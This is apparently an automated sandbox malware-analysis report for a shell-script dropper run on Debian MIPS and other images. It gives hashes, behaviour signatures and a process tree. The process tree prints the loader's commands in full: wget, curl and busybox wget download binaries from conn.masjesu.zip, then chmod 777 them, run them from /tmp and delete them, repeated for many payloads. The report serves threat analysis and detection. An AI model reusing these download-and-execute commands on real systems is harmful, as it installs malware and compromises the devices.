Analysis
-
max time kernel
134s -
max time network
136s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/11/2024, 01:00
Static task
static1
Behavioral task
behavioral1
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
-
Size
10KB
-
MD5
03977dc333adcf1bd239088130c5146a
-
SHA1
786dda0f9a258257c3c8c8c196b0c80525e5c921
-
SHA256
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613
-
SHA512
6ecac3ce1d920fd81213a199987a4a9a636a164c9bbf7c86cba42a80c7d290b356c0afcf43ffaab877a673204b166c43ca7a878f6ee263c34bdec145196d5066
-
SSDEEP
192:9C6r48xt6ApTzGrokonqyTCaxYxKC6r48oiTzGSkonqyr:/t6ApTzGrwCxiTzG0
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 856 chmod 996 chmod 842 chmod 975 chmod 982 chmod 877 chmod 821 chmod 863 chmod 989 chmod 750 chmod 884 chmod 905 chmod 919 chmod 926 chmod 933 chmod 940 chmod 947 chmod 743 chmod 870 chmod 954 chmod 891 chmod 898 chmod 1003 chmod 1010 chmod 849 chmod 961 chmod 968 chmod 912 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 744 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA 751 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD 823 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m 843 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt 850 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT 857 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To 864 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 871 aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 878 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW 885 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr 892 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK 899 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H 906 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs 913 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H 920 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs 927 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK 934 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD 941 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m 948 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 955 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA 962 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To 969 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 976 aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt 983 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT 990 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW 997 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr 1004 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 1011 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 742 busybox 908 wget 755 wget 827 wget 902 curl 901 wget 911 busybox 944 curl 946 busybox 981 busybox 988 busybox 738 curl 895 curl 929 wget 950 wget 986 curl 958 curl 747 curl 749 busybox 762 curl 848 busybox 866 wget 890 busybox 922 wget 964 wget 979 curl 838 busybox 869 busybox 918 busybox 932 busybox 951 curl 960 busybox 993 curl 746 wget 887 wget 888 curl 897 busybox 936 wget 965 curl 846 curl 971 wget 845 wget 904 busybox 909 curl 916 curl 937 curl 992 wget 853 curl 867 curl 880 wget 985 wget 995 busybox 881 curl 957 wget 974 busybox 780 busybox 852 wget 855 busybox 943 wget 972 curl 1002 busybox 717 wget 883 busybox 894 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt curl File opened for modification /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT curl File opened for modification /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt curl File opened for modification /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT curl File opened for modification /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 curl File opened for modification /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW curl File opened for modification /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK curl File opened for modification /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs curl File opened for modification /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 curl File opened for modification /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 curl File opened for modification /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA curl File opened for modification /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD curl File opened for modification /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H curl File opened for modification /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H curl File opened for modification /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs curl File opened for modification /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK curl File opened for modification /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 curl File opened for modification /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr curl File opened for modification /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 curl File opened for modification /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To curl File opened for modification /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr curl File opened for modification /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To curl File opened for modification /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW curl File opened for modification /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m curl File opened for modification /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD curl File opened for modification /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m curl File opened for modification /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 curl File opened for modification /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA curl
Processes
-
/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh1⤵PID:712
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:755
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:780
-
-
/bin/chmodchmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT./WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:862
-
-
/bin/chmodchmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:865
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:866
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675./aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:876
-
-
/bin/chmodchmod 777 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0./clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW./pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr./mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:897
-
-
/bin/chmodchmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵PID:925
-
-
/bin/chmodchmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:939
-
-
/bin/chmodchmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:950
-
-
